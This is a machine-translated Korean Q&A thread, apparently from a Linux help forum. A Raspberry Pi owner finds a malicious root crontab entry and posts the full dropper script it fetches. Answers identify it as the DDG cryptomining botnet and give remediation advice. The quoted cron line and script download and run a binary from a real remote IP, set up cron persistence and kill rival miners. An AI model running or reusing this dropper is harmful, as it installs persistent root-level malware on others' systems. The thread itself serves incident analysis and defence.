15 분마다 'xribfa4'를 실행하는 의심스러운 크론 탭 항목


58

내 Raspberry Pi의 루트 crontab 파일에 무언가를 추가하고 싶었고 의심스러운 것 같은 항목을 발견하여 Google에서 일부를 검색해도 아무것도 나타나지 않았습니다.

Crontab 항목 :

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

내용 http://103.219.112.66:8000/i.sh은 다음 과 같습니다.

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

내 Linux 지식은 제한적이지만 인도네시아 서버에서 바이너리를 다운로드하여 정기적으로 루트로 실행하는 것은 일반적인 것이 아닙니다.

이게 뭐야? 어떻게해야합니까?


16
원형입니다. 15 분마다 새로운 사본을 다운로드하여 설치합니다. 원격 서버의 사본이 변경되면 15 분 이내에이 cronjob을 실행하는 모든 서버가 새 코드를 실행합니다.
와일드 카드

5
라즈베리 파이가 인터넷에 연결되어 있습니까? 라즈베리 파이는 무엇입니까? 이것은 xribfa4를 검색 할 때 Google의 유일한 결과입니다. 이 작업을 수행해야하는 소프트웨어를 실행하지 않는 경우 바이러스 일 가능성이 있습니다.
kemotep

6
@kemotep는 문자열이 무작위이지만 IP는 Google이며 몇 가지 결과를 제공합니다. Ddg 마이닝 봇넷에 관한 것
18:49

9
찾았어요. IP가 인도네시아 정부 사이트에 등록되어 있다는 것은 미친 일입니다. 또한이 페이로드를 제공하는 거의 2000 개의 다른 IP가있는 것 같습니다.
kemotep

21
알아야 할 가장 중요한 점은 해당 crontab 항목을 제거하더라도 시스템에 여전히 감염 될 수있는 취약점이 있다는 것입니다. 해당 취약점을 찾아 수정해야합니다.
Hans-Martin Mosner

답변:


79

DDG 마이닝 봇넷입니다.

  1. RCE 취약점 악용
  2. crontab 수정
  3. 적절한 마이닝 프로그램 다운로드 (go로 작성)
  4. 채굴 과정 시작

DDG : 데이터베이스 서버를 목표로하는 마이닝 봇넷

봇넷이 다른 봇넷의 인프라를 빌릴 때 SystemdMiner

U & L : AWS EC2 인스턴스에서 마인드 맬웨어를 어떻게 죽일 수 있습니까? (손상된 서버)


4
네, 사실이게 다인 것 같습니다. 감사! 새로운 것이 나오지 않으면 이것을 답변으로 표시합니다.
Peter Dam

8
루팅 된 기계에 대한 일반적인 조언을 잊지 마십시오. 구멍을 고칠 수 있도록 어떻게 들어 갔는지 알아보십시오. 이것으로부터 배우고 보안을 강화하십시오. 마지막으로 기계를 말끔히하고 다시 설치하십시오.
marcelm

3
좋은 소식은 파이를위한 광부가 아니라 i686과 x86_64를위한 것 같습니다.
Mark

13
@Mark 좋은 소식은 어떻습니까? 누군가 알 수없는 진입 점을 사용하여 자신의 Pi를 완전히 제어하고 Pi의 모든 비밀 (암호 포함)에 완전히 액세스 할 수있었습니다. 광부 실행 여부는 실제로 "작은 불편 함"의 영역에 있습니다.
marcelm

4
@marcelm, 공격자는 그것에 대한 모든 권한을 얻었고, 거의 확실하게 그 컨트롤로 중요한 일을하지 않았습니다.
마크

2

실제로 필요한 TCP 및 UDP 포트를 파악한 다음 라우터 방화벽의 다른 모든 포트를 차단하십시오. 아마도 , 그 crontab을 항목은 다시 나타나지 않습니다.

Shields Up! 을 사용하여 열려 있고 공개 된 포트를 확인할 수 있습니다 . grc.com의 기능 .


5
또는 취약점을 패치 할 수 있습니다.
Harper-복원 상태 Monica

1
@ 하퍼 절대적으로! 그것은 주어진 것입니다. 아마도 사용하지 않는 포트를 먼저 차단하지 않으면 패치를 시도하는 동안 다시 감염 될 수 있다고 생각했습니다.
Mike Waters


1
이것은 항상 (단, TCP 및 UDP로 제한되지 않음) 항상입니다. 일명 긍정적 인 보안 모델, 화이트리스트 또는 기본 거부-명시 적으로 사용하지 않거나 필요로하지 않는 모든 트래픽 거부-침입에 노출되는 구멍이없는 유일한 방법입니다.
antichris
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.